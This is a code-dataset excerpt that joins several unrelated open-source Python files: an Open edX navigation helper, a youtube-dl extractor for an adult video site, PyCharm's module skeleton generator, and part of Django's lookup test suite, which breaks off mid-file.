# this calls get_children rather than just children b/c old mongo includes private children
# in children but not in get_children
child_locs = [c.location for c in section_desc.get_children()]
# positions are 1-indexed, and should be strings to be consistent with
# url parsing.
position_list.append(str(child_locs.index(path[path_index + 1]) + 1))
position = "_".join(position_list)
return (course_id, chapter, section, vertical, position, path[-1])
def navigation_index(position):
"""
Get the navigation index from the position argument (where the position argument was recieved from a call to
path_to_location)
Argument:
position - result of position returned from call to path_to_location. This is an underscore (_) separated string of
vertical 1-indexed positions. If the course is built in Studio then you'll never see verticals as children of
verticals, and so extremely often one will only see the first vertical as an integer position. This specific action
is to allow navigation / breadcrumbs to locate the topmost item because this is the location actually required by
the LMS code
Returns:
1-based integer of the position of the desired item within the vertical
"""
if position is None:
return None
try:
navigation_position = int(position.split('_', 1)[0])
except (ValueError, TypeError):
LOGGER.exception(u'Bad position %r passed to navigation_index, will assume first position', position)
navigation_position = 1
return navigation_position
|
aboutsajjad/Bridge
|
refs/heads/master
|
app_packages/youtube_dl/extractor/slutload.py
|
5
|
from __future__ import unicode_literals
import re
from .common import InfoExtractor
class SlutloadIE(InfoExtractor):
_VALID_URL = r'^https?://(?:\w+\.)?slutload\.com/video/[^/]+/(?P<id>[^/]+)/?$'
_TESTS = [{
'url': 'http://www.slutload.com/video/virginie-baisee-en-cam/TD73btpBqSxc/',
'md5': '868309628ba00fd488cf516a113fd717',
'info_dict': {
'id': 'TD73btpBqSxc',
'ext': 'mp4',
'title': 'virginie baisee en cam',
'age_limit': 18,
'thumbnail': r're:https?://.*?\.jpg'
}
}, {
# mobile site
'url': 'http://mobile.slutload.com/video/masturbation-solo/fviFLmc6kzJ/',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
desktop_url = re.sub(r'^(https?://)mobile\.', r'\1', url)
webpage = self._download_webpage(desktop_url, video_id)
video_title = self._html_search_regex(r'<h1><strong>([^<]+)</strong>',
webpage, 'title').strip()
video_url = self._html_search_regex(
r'(?s)<div id="vidPlayer"\s+data-url="([^"]+)"',
webpage, 'video URL')
thumbnail = self._html_search_regex(
r'(?s)<div id="vidPlayer"\s+.*?previewer-file="([^"]+)"',
webpage, 'thumbnail', fatal=False)
return {
'id': video_id,
'url': video_url,
'title': video_title,
'thumbnail': thumbnail,
'age_limit': 18
}
|
izonder/intellij-community
|
refs/heads/master
|
python/helpers/generator3.py
|
37
|
# encoding: utf-8
import atexit
import zipfile
# TODO: Move all CLR-specific functions to clr_tools
from pycharm_generator_utils.module_redeclarator import *
from pycharm_generator_utils.util_methods import *
from pycharm_generator_utils.constants import *
from pycharm_generator_utils.clr_tools import *
debug_mode = False
def redo_module(module_name, outfile, module_file_name, doing_builtins):
# gobject does 'del _gobject' in its __init__.py, so the chained attribute lookup code
# fails to find 'gobject._gobject'. thus we need to pull the module directly out of
# sys.modules
mod = sys.modules.get(module_name)
mod_path = module_name.split('.')
if not mod and sys.platform == 'cli':
# "import System.Collections" in IronPython 2.7 doesn't actually put System.Collections in sys.modules
# instead, sys.modules['System'] get set to a Microsoft.Scripting.Actions.NamespaceTracker and Collections can be
# accessed as its attribute
mod = sys.modules[mod_path[0]]
for component in mod_path[1:]:
try:
mod = getattr(mod, component)
except AttributeError:
mod = None
report("Failed to find CLR module " + module_name)
break
if mod:
action("restoring")
r = ModuleRedeclarator(mod, outfile, module_file_name, doing_builtins=doing_builtins)
r.redo(module_name, ".".join(mod_path[:-1]) in MODULES_INSPECT_DIR)
action("flushing")
r.flush()
else:
report("Failed to find imported module in sys.modules " + module_name)
# find_binaries functionality
def cut_binary_lib_suffix(path, f):
"""
@param path where f lives
@param f file name of a possible binary lib file (no path)
@return f without a binary suffix (that is, an importable name) if path+f is indeed a binary lib, or None.
Note: if for .pyc or .pyo file a .py is found, None is returned.
"""
if not f.endswith(".pyc") and not f.endswith(".typelib") and not f.endswith(".pyo") and not f.endswith(".so") and not f.endswith(".pyd"):
return None
ret = None
match = BIN_MODULE_FNAME_PAT.match(f)
if match:
ret = match.group(1)
modlen = len('module')
retlen = len(ret)
if ret.endswith('module') and retlen > modlen and f.endswith('.so'): # what for?
ret = ret[:(retlen - modlen)]
if f.endswith('.pyc') or f.endswith('.pyo'):
fullname = os.path.join(path, f[:-1]) # check for __pycache__ is made outside
if os.path.exists(fullname):
ret = None
pat_match = TYPELIB_MODULE_FNAME_PAT.match(f)
if pat_match:
ret = "gi.repository." + pat_match.group(1)
return ret
def is_posix_skipped_module(path, f):
if os.name == 'posix':
name = os.path.join(path, f)
for mod in POSIX_SKIP_MODULES:
if name.endswith(mod):
return True
return False
def is_mac_skipped_module(path, f):
fullname = os.path.join(path, f)
m = MAC_STDLIB_PATTERN.match(fullname)
if not m: return 0
relpath = m.group(2)
for module in MAC_SKIP_MODULES:
if relpath.startswith(module): return 1
return 0
def is_skipped_module(path, f):
return is_mac_skipped_module(path, f) or is_posix_skipped_module(path, f[:f.rindex('.')]) or 'pynestkernel' in f
def is_module(d, root):
return (os.path.exists(os.path.join(root, d, "__init__.py")) or
os.path.exists(os.path.join(root, d, "__init__.pyc")) or
os.path.exists(os.path.join(root, d, "__init__.pyo")))
def walk_python_path(path):
for root, dirs, files in os.walk(path):
if root.endswith('__pycache__'):
continue
dirs_copy = list(dirs)
for d in dirs_copy:
if d.endswith('__pycache__') or not is_module(d, root):
dirs.remove(d)
# some files show up but are actually non-existent symlinks
yield root, [f for f in files if os.path.exists(os.path.join(root, f))]
def list_binaries(paths):
"""
Finds binaries in the given list of paths.
Understands nested paths, as sys.paths have it (both "a/b" and "a/b/c").
Tries to be case-insensitive, but case-preserving.
@param paths: list of paths.
@return: dict[module_name, full_path]
"""
SEP = os.path.sep
res = {} # {name.upper(): (name, full_path)} # b/c windows is case-oblivious
if not paths:
return {}
if IS_JAVA: # jython can't have binary modules
return {}
paths = sorted_no_case(paths)
for path in paths:
if path == os.path.dirname(sys.argv[0]): continue
for root, files in walk_python_path(path):
cutpoint = path.rfind(SEP)
if cutpoint > 0:
preprefix = path[(cutpoint + len(SEP)):] + '.'
else:
preprefix = ''
prefix = root[(len(path) + len(SEP)):].replace(SEP, '.')
if prefix:
prefix += '.'
note("root: %s path: %s prefix: %s preprefix: %s", root, path, prefix, preprefix)
for f in files:
name = cut_binary_lib_suffix(root, f)
if name and not is_skipped_module(root, f):
note("cutout: %s", name)
if preprefix:
note("prefixes: %s %s", prefix, preprefix)
pre_name = (preprefix + prefix + name).upper()
if pre_name in res:
res.pop(pre_name) # there might be a dupe, if paths got both a/b and a/b/c
note("done with %s", name)
the_name = prefix + name
file_path = os.path.join(root, f)
res[the_name.upper()] = (the_name, file_path, os.path.getsize(file_path), int(os.stat(file_path).st_mtime))
return list(res.values())
def list_sources(paths):
#noinspection PyBroadException
try:
for path in paths:
if path == os.path.dirname(sys.argv[0]): continue
path = os.path.normpath(path)
if path.endswith('.egg') and os.path.isfile(path):
say("%s\t%s\t%d", path, path, os.path.getsize(path))
for root, files in walk_python_path(path):
for name in files:
if name.endswith('.py'):
file_path = os.path.join(root, name)
say("%s\t%s\t%d", os.path.normpath(file_path), path, os.path.getsize(file_path))
say('END')
sys.stdout.flush()
except:
import traceback
traceback.print_exc()
sys.exit(1)
#noinspection PyBroadException
def zip_sources(zip_path):
if not os.path.exists(zip_path):
os.makedirs(zip_path)
zip_filename = os.path.normpath(os.path.sep.join([zip_path, "skeletons.zip"]))
try:
zip = zipfile.ZipFile(zip_filename, 'w', zipfile.ZIP_DEFLATED)
except:
zip = zipfile.ZipFile(zip_filename, 'w')
try:
try:
while True:
line = sys.stdin.readline()
line = line.strip()
if line == '-':
break
if line:
# This line will break the split:
# /.../dist-packages/setuptools/script template (dev).py setuptools/script template (dev).py
split_items = line.split()
if len(split_items) > 2:
match_two_files = re.match(r'^(.+\.py)\s+(.+\.py)$', line)
if not match_two_files:
report("Error(zip_sources): invalid line '%s'" % line)
continue
split_items = match_two_files.group(1, 2)
(path, arcpath) = split_items
zip.write(path, arcpath)
else:
# busy waiting for input from PyCharm...
time.sleep(0.10)
say('OK: ' + zip_filename)
sys.stdout.flush()
except:
import traceback
traceback.print_exc()
say('Error creating archive.')
sys.exit(1)
finally:
zip.close()
# command-line interface
#noinspection PyBroadException
def process_one(name, mod_file_name, doing_builtins, subdir):
"""
Processes a single module named name defined in file_name (autodetect if not given).
Returns True on success.
"""
if has_regular_python_ext(name):
report("Ignored a regular Python file %r", name)
return True
if not quiet:
say(name)
sys.stdout.flush()
action("doing nothing")
try:
fname = build_output_name(subdir, name)
action("opening %r", fname)
old_modules = list(sys.modules.keys())
imported_module_names = []
class MyFinder:
#noinspection PyMethodMayBeStatic
def find_module(self, fullname, path=None):
if fullname != name:
imported_module_names.append(fullname)
return None
my_finder = None
if hasattr(sys, 'meta_path'):
my_finder = MyFinder()
sys.meta_path.append(my_finder)
else:
imported_module_names = None
action("importing")
__import__(name) # sys.modules will fill up with what we want
if my_finder:
sys.meta_path.remove(my_finder)
if imported_module_names is None:
imported_module_names = [m for m in sys.modules.keys() if m not in old_modules]
redo_module(name, fname, mod_file_name, doing_builtins)
# The C library may have called Py_InitModule() multiple times to define several modules (gtk._gtk and gtk.gdk);
# restore all of them
path = name.split(".")
redo_imports = not ".".join(path[:-1]) in MODULES_INSPECT_DIR
if imported_module_names and redo_imports:
for m in sys.modules.keys():
if m.startswith("pycharm_generator_utils"): continue
action("looking at possible submodule %r", m)
# if module has __file__ defined, it has Python source code and doesn't need a skeleton
if m not in old_modules and m not in imported_module_names and m != name and not hasattr(
sys.modules[m], '__file__'):
if not quiet:
say(m)
sys.stdout.flush()
fname = build_output_name(subdir, m)
action("opening %r", fname)
try:
redo_module(m, fname, mod_file_name, doing_builtins)
finally:
action("closing %r", fname)
except:
exctype, value = sys.exc_info()[:2]
msg = "Failed to process %r while %s: %s"
args = name, CURRENT_ACTION, str(value)
report(msg, *args)
if debug_mode:
if sys.platform == 'cli':
import traceback
traceback.print_exc(file=sys.stderr)
raise
return False
return True
def get_help_text():
return (
#01234567890123456789012345678901234567890123456789012345678901234567890123456789
'Generates interface skeletons for python modules.' '\n'
'Usage: ' '\n'
' generator [options] [module_name [file_name]]' '\n'
' generator [options] -L ' '\n'
'module_name is fully qualified, and file_name is where the module is defined.' '\n'
'E.g. foo.bar /usr/lib/python/foo_bar.so' '\n'
'For built-in modules file_name is not provided.' '\n'
'Output files will be named as modules plus ".py" suffix.' '\n'
'Normally every name processed will be printed and stdout flushed.' '\n'
'directory_list is one string separated by OS-specific path separtors.' '\n'
'\n'
'Options are:' '\n'
' -h -- prints this help message.' '\n'
' -d dir -- output dir, must be writable. If not given, current dir is used.' '\n'
' -b -- use names from sys.builtin_module_names' '\n'
' -q -- quiet, do not print anything on stdout. Errors still go to stderr.' '\n'
' -x -- die on exceptions with a stacktrace; only for debugging.' '\n'
' -v -- be verbose, print lots of debug output to stderr' '\n'
' -c modules -- import CLR assemblies with specified names' '\n'
' -p -- run CLR profiler ' '\n'
' -s path_list -- add paths to sys.path before run; path_list lists directories' '\n'
' separated by path separator char, e.g. "c:\\foo;d:\\bar;c:\\with space"' '\n'
' -L -- print version and then a list of binary module files found ' '\n'
' on sys.path and in directories in directory_list;' '\n'
' lines are "qualified.module.name /full/path/to/module_file.{pyd,dll,so}"' '\n'
' -S -- lists all python sources found in sys.path and in directories in directory_list\n'
' -z archive_name -- zip files to archive_name. Accepts files to be archived from stdin in format <filepath> <name in archive>'
)
if __name__ == "__main__":
from getopt import getopt
helptext = get_help_text()
opts, args = getopt(sys.argv[1:], "d:hbqxvc:ps:LSz")
opts = dict(opts)
quiet = '-q' in opts
_is_verbose = '-v' in opts
subdir = opts.get('-d', '')
if not opts or '-h' in opts:
say(helptext)
sys.exit(0)
if '-L' not in opts and '-b' not in opts and '-S' not in opts and not args:
report("Neither -L nor -b nor -S nor any module name given")
sys.exit(1)
if "-x" in opts:
debug_mode = True
# patch sys.path?
extra_path = opts.get('-s', None)
if extra_path:
source_dirs = extra_path.split(os.path.pathsep)
for p in source_dirs:
if p and p not in sys.path:
sys.path.append(p) # we need this to make things in additional dirs importable
note("Altered sys.path: %r", sys.path)
# find binaries?
if "-L" in opts:
if len(args) > 0:
report("Expected no args with -L, got %d args", len(args))
sys.exit(1)
say(VERSION)
results = list(list_binaries(sys.path))
results.sort()
for name, path, size, last_modified in results:
say("%s\t%s\t%d\t%d", name, path, size, last_modified)
sys.exit(0)
if "-S" in opts:
if len(args) > 0:
report("Expected no args with -S, got %d args", len(args))
sys.exit(1)
say(VERSION)
list_sources(sys.path)
sys.exit(0)
if "-z" in opts:
if len(args) != 1:
report("Expected 1 arg with -z, got %d args", len(args))
sys.exit(1)
zip_sources(args[0])
sys.exit(0)
# build skeleton(s)
timer = Timer()
# determine names
if '-b' in opts:
if args:
report("No names should be specified with -b")
sys.exit(1)
names = list(sys.builtin_module_names)
if not BUILTIN_MOD_NAME in names:
names.append(BUILTIN_MOD_NAME)
if '__main__' in names:
names.remove('__main__') # we don't want ourselves processed
ok = True
for name in names:
ok = process_one(name, None, True, subdir) and ok
if not ok:
sys.exit(1)
else:
if len(args) > 2:
report("Only module_name or module_name and file_name should be specified; got %d args", len(args))
sys.exit(1)
name = args[0]
if len(args) == 2:
mod_file_name = args[1]
else:
mod_file_name = None
if sys.platform == 'cli':
#noinspection PyUnresolvedReferences
import clr
refs = opts.get('-c', '')
if refs:
for ref in refs.split(';'): clr.AddReferenceByPartialName(ref)
if '-p' in opts:
atexit.register(print_profile)
# We take module name from import statement
name = get_namespace_by_name(name)
if not process_one(name, mod_file_name, False, subdir):
sys.exit(1)
say("Generation completed in %d ms", timer.elapsed())
|
baylee/django
|
refs/heads/master
|
tests/lookup/tests.py
|
27
|
from __future__ import unicode_literals
import collections
from datetime import datetime
from operator import attrgetter
from unittest import skipUnless
from django.core.exceptions import FieldError
from django.db import connection
from django.test import (
TestCase, TransactionTestCase, ignore_warnings, skipUnlessDBFeature,
)
from django.utils.deprecation import RemovedInDjango20Warning
from .models import Article, Author, Game, MyISAMArticle, Player, Season, Tag
class LookupTests(TestCase):
def setUp(self):
# Create a few Authors.
self.au1 = Author.objects.create(name='Author 1')
self.au2 = Author.objects.create(name='Author 2')
# Create a couple of Articles.
self.a1 = Article.objects.create(headline='Article 1', pub_date=datetime(2005, 7, 26), author=self.au1)
self.a2 = Article.objects.create(headline='Article 2', pub_date=datetime(2005, 7, 27), author=self.au1)
self.a3 = Article.objects.create(headline='Article 3', pub_date=datetime(2005, 7, 27), author=self.au1)
self.a4 = Article.objects.create(headline='Article 4', pub_date=datetime(2005, 7, 28), author=self.au1)
self.a5 = Article.objects.create(headline='Article 5', pub_date=datetime(2005, 8, 1, 9, 0), author=self.au2)
self.a6 = Article.objects.create(headline='Article 6', pub_date=datetime(2005, 8, 1, 8, 0), author=self.au2)
self.a7 = Article.objects.create(headline='Article 7', pub_date=datetime(2005, 7, 27), author=self.au2)
# Create a few Tags.
self.t1 = Tag.objects.create(name='Tag 1')
self.t1.articles.add(self.a1, self.a2, self.a3)
self.t2 = Tag.objects.create(name='Tag 2')
self.t2.articles.add(self.a3, self.a4, self.a5)
self.t3 = Tag.objects.create(name='Tag 3')
self.t3.articles.add(self.a5, self.a6, self.a7)
def test_exists(self):
# We can use .exists() to check that there are some
self.assertTrue(Article.objects.exists())
for a in Article.objects.all():
a.delete()
# There should be none now!
self.assertFalse(Article.objects.exists())
def test_lookup_int_as_str(self):
# Integer value can be queried using string
self.assertQuerysetEqual(Article.objects.filter(id__iexact=str(self.a1.id)),
['<Article: Article 1>'])
@skipUnlessDBFeature('supports_date_lookup_using_string')
def test_lookup_date_as_str(self):
# A date lookup can be performed using a string search
self.assertQuerysetEqual(
Article.objects.filter(pub_date__startswith='2005'),
[
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
def test_iterator(self):
# Each QuerySet gets iterator(), which is a generator that "lazily"
# returns results using database-level iteration.
self.assertIsInstance(Article.objects.iterator(), collections.Iterator)
self.assertQuerysetEqual(
Article.objects.iterator(),
[
'Article 5',
'Article 6',
'Article 4',
'Article 2',
'Article 3',
'Article 7',
'Article 1',
],
transform=attrgetter('headline')
)
# iterator() can be used on any QuerySet.
self.assertQuerysetEqual(
Article.objects.filter(headline__endswith='4').iterator(),
['Article 4'],
transform=attrgetter('headline'))
def test_count(self):
# count() returns the number of objects matching search criteria.
self.assertEqual(Article.objects.count(), 7)
self.assertEqual(Article.objects.filter(pub_date__exact=datetime(2005, 7, 27)).count(), 3)
self.assertEqual(Article.objects.filter(headline__startswith='Blah blah').count(), 0)
# count() should respect sliced query sets.
articles = Article.objects.all()
self.assertEqual(articles.count(), 7)
self.assertEqual(articles[:4].count(), 4)
self.assertEqual(articles[1:100].count(), 6)
self.assertEqual(articles[10:100].count(), 0)
# Date and date/time lookups can also be done with strings.
self.assertEqual(Article.objects.filter(pub_date__exact='2005-07-27 00:00:00').count(), 3)
def test_in_bulk(self):
# in_bulk() takes a list of IDs and returns a dictionary mapping IDs to objects.
arts = Article.objects.in_bulk([self.a1.id, self.a2.id])
self.assertEqual(arts[self.a1.id], self.a1)
self.assertEqual(arts[self.a2.id], self.a2)
self.assertEqual(
Article.objects.in_bulk(),
{
self.a1.id: self.a1,
self.a2.id: self.a2,
self.a3.id: self.a3,
self.a4.id: self.a4,
self.a5.id: self.a5,
self.a6.id: self.a6,
self.a7.id: self.a7,
}
)
self.assertEqual(Article.objects.in_bulk([self.a3.id]), {self.a3.id: self.a3})
self.assertEqual(Article.objects.in_bulk({self.a3.id}), {self.a3.id: self.a3})
self.assertEqual(Article.objects.in_bulk(frozenset([self.a3.id])), {self.a3.id: self.a3})
self.assertEqual(Article.objects.in_bulk((self.a3.id,)), {self.a3.id: self.a3})
self.assertEqual(Article.objects.in_bulk([1000]), {})
self.assertEqual(Article.objects.in_bulk([]), {})
self.assertEqual(Article.objects.in_bulk(iter([self.a1.id])), {self.a1.id: self.a1})
self.assertEqual(Article.objects.in_bulk(iter([])), {})
with self.assertRaises(TypeError):
Article.objects.in_bulk(headline__startswith='Blah')
def test_values(self):
# values() returns a list of dictionaries instead of object instances --
# and you can specify which fields you want to retrieve.
def identity(x):
return x
self.assertQuerysetEqual(
Article.objects.values('headline'),
[
{'headline': 'Article 5'},
{'headline': 'Article 6'},
{'headline': 'Article 4'},
{'headline': 'Article 2'},
{'headline': 'Article 3'},
{'headline': 'Article 7'},
{'headline': 'Article 1'},
],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.filter(pub_date__exact=datetime(2005, 7, 27)).values('id'),
[{'id': self.a2.id}, {'id': self.a3.id}, {'id': self.a7.id}],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.values('id', 'headline'),
[
{'id': self.a5.id, 'headline': 'Article 5'},
{'id': self.a6.id, 'headline': 'Article 6'},
{'id': self.a4.id, 'headline': 'Article 4'},
{'id': self.a2.id, 'headline': 'Article 2'},
{'id': self.a3.id, 'headline': 'Article 3'},
{'id': self.a7.id, 'headline': 'Article 7'},
{'id': self.a1.id, 'headline': 'Article 1'},
],
transform=identity
)
# You can use values() with iterator() for memory savings,
# because iterator() uses database-level iteration.
self.assertQuerysetEqual(
Article.objects.values('id', 'headline').iterator(),
[
{'headline': 'Article 5', 'id': self.a5.id},
{'headline': 'Article 6', 'id': self.a6.id},
{'headline': 'Article 4', 'id': self.a4.id},
{'headline': 'Article 2', 'id': self.a2.id},
{'headline': 'Article 3', 'id': self.a3.id},
{'headline': 'Article 7', 'id': self.a7.id},
{'headline': 'Article 1', 'id': self.a1.id},
],
transform=identity
)
# The values() method works with "extra" fields specified in extra(select).
self.assertQuerysetEqual(
Article.objects.extra(select={'id_plus_one': 'id + 1'}).values('id', 'id_plus_one'),
[
{'id': self.a5.id, 'id_plus_one': self.a5.id + 1},
{'id': self.a6.id, 'id_plus_one': self.a6.id + 1},
{'id': self.a4.id, 'id_plus_one': self.a4.id + 1},
{'id': self.a2.id, 'id_plus_one': self.a2.id + 1},
{'id': self.a3.id, 'id_plus_one': self.a3.id + 1},
{'id': self.a7.id, 'id_plus_one': self.a7.id + 1},
{'id': self.a1.id, 'id_plus_one': self.a1.id + 1},
],
transform=identity
)
data = {
'id_plus_one': 'id+1',
'id_plus_two': 'id+2',
'id_plus_three': 'id+3',
'id_plus_four': 'id+4',
'id_plus_five': 'id+5',
'id_plus_six': 'id+6',
'id_plus_seven': 'id+7',
'id_plus_eight': 'id+8',
}
self.assertQuerysetEqual(
Article.objects.filter(id=self.a1.id).extra(select=data).values(*data.keys()),
[{
'id_plus_one': self.a1.id + 1,
'id_plus_two': self.a1.id + 2,
'id_plus_three': self.a1.id + 3,
'id_plus_four': self.a1.id + 4,
'id_plus_five': self.a1.id + 5,
'id_plus_six': self.a1.id + 6,
'id_plus_seven': self.a1.id + 7,
'id_plus_eight': self.a1.id + 8,
}], transform=identity
)
# You can specify fields from forward and reverse relations, just like filter().
self.assertQuerysetEqual(
Article.objects.values('headline', 'author__name'),
[
{'headline': self.a5.headline, 'author__name': self.au2.name},
{'headline': self.a6.headline, 'author__name': self.au2.name},
{'headline': self.a4.headline, 'author__name': self.au1.name},
{'headline': self.a2.headline, 'author__name': self.au1.name},
{'headline': self.a3.headline, 'author__name': self.au1.name},
{'headline': self.a7.headline, 'author__name': self.au2.name},
{'headline': self.a1.headline, 'author__name': self.au1.name},
], transform=identity
)
self.assertQuerysetEqual(
Author.objects.values('name', 'article__headline').order_by('name', 'article__headline'),
[
{'name': self.au1.name, 'article__headline': self.a1.headline},
{'name': self.au1.name, 'article__headline': self.a2.headline},
{'name': self.au1.name, 'article__headline': self.a3.headline},
{'name': self.au1.name, 'article__headline': self.a4.headline},
{'name': self.au2.name, 'article__headline': self.a5.headline},
{'name': self.au2.name, 'article__headline': self.a6.headline},
{'name': self.au2.name, 'article__headline': self.a7.headline},
], transform=identity
)
self.assertQuerysetEqual(
(
Author.objects
.values('name', 'article__headline', 'article__tag__name')
.order_by('name', 'article__headline', 'article__tag__name')
),
[
{'name': self.au1.name, 'article__headline': self.a1.headline, 'article__tag__name': self.t1.name},
{'name': self.au1.name, 'article__headline': self.a2.headline, 'article__tag__name': self.t1.name},
{'name': self.au1.name, 'article__headline': self.a3.headline, 'article__tag__name': self.t1.name},
{'name': self.au1.name, 'article__headline': self.a3.headline, 'article__tag__name': self.t2.name},
{'name': self.au1.name, 'article__headline': self.a4.headline, 'article__tag__name': self.t2.name},
{'name': self.au2.name, 'article__headline': self.a5.headline, 'article__tag__name': self.t2.name},
{'name': self.au2.name, 'article__headline': self.a5.headline, 'article__tag__name': self.t3.name},
{'name': self.au2.name, 'article__headline': self.a6.headline, 'article__tag__name': self.t3.name},
{'name': self.au2.name, 'article__headline': self.a7.headline, 'article__tag__name': self.t3.name},
], transform=identity
)
# However, an exception FieldDoesNotExist will be thrown if you specify
# a non-existent field name in values() (a field that is neither in the
# model nor in extra(select)).
with self.assertRaises(FieldError):
Article.objects.extra(select={'id_plus_one': 'id + 1'}).values('id', 'id_plus_two')
# If you don't specify field names to values(), all are returned.
self.assertQuerysetEqual(
Article.objects.filter(id=self.a5.id).values(),
[{
'id': self.a5.id,
'author_id': self.au2.id,
'headline': 'Article 5',
'pub_date': datetime(2005, 8, 1, 9, 0)
}],
transform=identity
)
def test_values_list(self):
# values_list() is similar to values(), except that the results are
# returned as a list of tuples, rather than a list of dictionaries.
# Within each tuple, the order of the elements is the same as the order
# of fields in the values_list() call.
def identity(x):
return x
self.assertQuerysetEqual(
Article.objects.values_list('headline'),
[
('Article 5',),
('Article 6',),
('Article 4',),
('Article 2',),
('Article 3',),
('Article 7',),
('Article 1',),
], transform=identity
)
self.assertQuerysetEqual(
Article.objects.values_list('id').order_by('id'),
[(self.a1.id,), (self.a2.id,), (self.a3.id,), (self.a4.id,), (self.a5.id,), (self.a6.id,), (self.a7.id,)],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.values_list('id', flat=True).order_by('id'),
[self.a1.id, self.a2.id, self.a3.id, self.a4.id, self.a5.id, self.a6.id, self.a7.id],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.extra(select={'id_plus_one': 'id+1'}).order_by('id').values_list('id'),
[(self.a1.id,), (self.a2.id,), (self.a3.id,), (self.a4.id,), (self.a5.id,), (self.a6.id,), (self.a7.id,)],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.extra(select={'id_plus_one': 'id+1'}).order_by('id').values_list('id_plus_one', 'id'),
[
(self.a1.id + 1, self.a1.id),
(self.a2.id + 1, self.a2.id),
(self.a3.id + 1, self.a3.id),
(self.a4.id + 1, self.a4.id),
(self.a5.id + 1, self.a5.id),
(self.a6.id + 1, self.a6.id),
(self.a7.id + 1, self.a7.id)
],
transform=identity
)
self.assertQuerysetEqual(
Article.objects.extra(select={'id_plus_one': 'id+1'}).order_by('id').values_list('id', 'id_plus_one'),
[
(self.a1.id, self.a1.id + 1),
(self.a2.id, self.a2.id + 1),
(self.a3.id, self.a3.id + 1),
(self.a4.id, self.a4.id + 1),
(self.a5.id, self.a5.id + 1),
(self.a6.id, self.a6.id + 1),
(self.a7.id, self.a7.id + 1)
],
transform=identity
)
args = ('name', 'article__headline', 'article__tag__name')
self.assertQuerysetEqual(
Author.objects.values_list(*args).order_by(*args),
[
(self.au1.name, self.a1.headline, self.t1.name),
(self.au1.name, self.a2.headline, self.t1.name),
(self.au1.name, self.a3.headline, self.t1.name),
(self.au1.name, self.a3.headline, self.t2.name),
(self.au1.name, self.a4.headline, self.t2.name),
(self.au2.name, self.a5.headline, self.t2.name),
(self.au2.name, self.a5.headline, self.t3.name),
(self.au2.name, self.a6.headline, self.t3.name),
(self.au2.name, self.a7.headline, self.t3.name),
], transform=identity
)
with self.assertRaises(TypeError):
Article.objects.values_list('id', 'headline', flat=True)
def test_get_next_previous_by(self):
# Every DateField and DateTimeField creates get_next_by_FOO() and
# get_previous_by_FOO() methods. In the case of identical date values,
# these methods will use the ID as a fallback check. This guarantees
# that no records are skipped or duplicated.
self.assertEqual(repr(self.a1.get_next_by_pub_date()), '<Article: Article 2>')
self.assertEqual(repr(self.a2.get_next_by_pub_date()), '<Article: Article 3>')
self.assertEqual(repr(self.a2.get_next_by_pub_date(headline__endswith='6')), '<Article: Article 6>')
self.assertEqual(repr(self.a3.get_next_by_pub_date()), '<Article: Article 7>')
self.assertEqual(repr(self.a4.get_next_by_pub_date()), '<Article: Article 6>')
with self.assertRaises(Article.DoesNotExist):
self.a5.get_next_by_pub_date()
self.assertEqual(repr(self.a6.get_next_by_pub_date()), '<Article: Article 5>')
self.assertEqual(repr(self.a7.get_next_by_pub_date()), '<Article: Article 4>')
self.assertEqual(repr(self.a7.get_previous_by_pub_date()), '<Article: Article 3>')
self.assertEqual(repr(self.a6.get_previous_by_pub_date()), '<Article: Article 4>')
self.assertEqual(repr(self.a5.get_previous_by_pub_date()), '<Article: Article 6>')
self.assertEqual(repr(self.a4.get_previous_by_pub_date()), '<Article: Article 7>')
self.assertEqual(repr(self.a3.get_previous_by_pub_date()), '<Article: Article 2>')
self.assertEqual(repr(self.a2.get_previous_by_pub_date()), '<Article: Article 1>')
def test_escaping(self):
# Underscores, percent signs and backslashes have special meaning in the
# underlying SQL code, but Django handles the quoting of them automatically.
Article.objects.create(headline='Article_ with underscore', pub_date=datetime(2005, 11, 20))
self.assertQuerysetEqual(
Article.objects.filter(headline__startswith='Article'),
[
'<Article: Article_ with underscore>',
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
self.assertQuerysetEqual(
Article.objects.filter(headline__startswith='Article_'),
['<Article: Article_ with underscore>']
)
Article.objects.create(headline='Article% with percent sign', pub_date=datetime(2005, 11, 21))
self.assertQuerysetEqual(
Article.objects.filter(headline__startswith='Article'),
[
'<Article: Article% with percent sign>',
'<Article: Article_ with underscore>',
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
self.assertQuerysetEqual(
Article.objects.filter(headline__startswith='Article%'),
['<Article: Article% with percent sign>']
)
Article.objects.create(headline='Article with \\ backslash', pub_date=datetime(2005, 11, 22))
self.assertQuerysetEqual(
Article.objects.filter(headline__contains='\\'),
['<Article: Article with \ backslash>']
)
def test_exclude(self):
Article.objects.create(headline='Article_ with underscore', pub_date=datetime(2005, 11, 20))
Article.objects.create(headline='Article% with percent sign', pub_date=datetime(2005, 11, 21))
Article.objects.create(headline='Article with \\ backslash', pub_date=datetime(2005, 11, 22))
# exclude() is the opposite of filter() when doing lookups:
self.assertQuerysetEqual(
Article.objects.filter(headline__contains='Article').exclude(headline__contains='with'),
[
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
self.assertQuerysetEqual(
Article.objects.exclude(headline__startswith="Article_"),
[
'<Article: Article with \\ backslash>',
'<Article: Article% with percent sign>',
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 7>',
'<Article: Article 1>',
]
)
self.assertQuerysetEqual(
Article.objects.exclude(headline="Article 7"),
[
'<Article: Article with \\ backslash>',
'<Article: Article% with percent sign>',
'<Article: Article_ with underscore>',
'<Article: Article 5>',
'<Article: Article 6>',
'<Article: Article 4>',
'<Article: Article 2>',
'<Article: Article 3>',
'<Article: Article 1>',
]
)
def test_none(self):
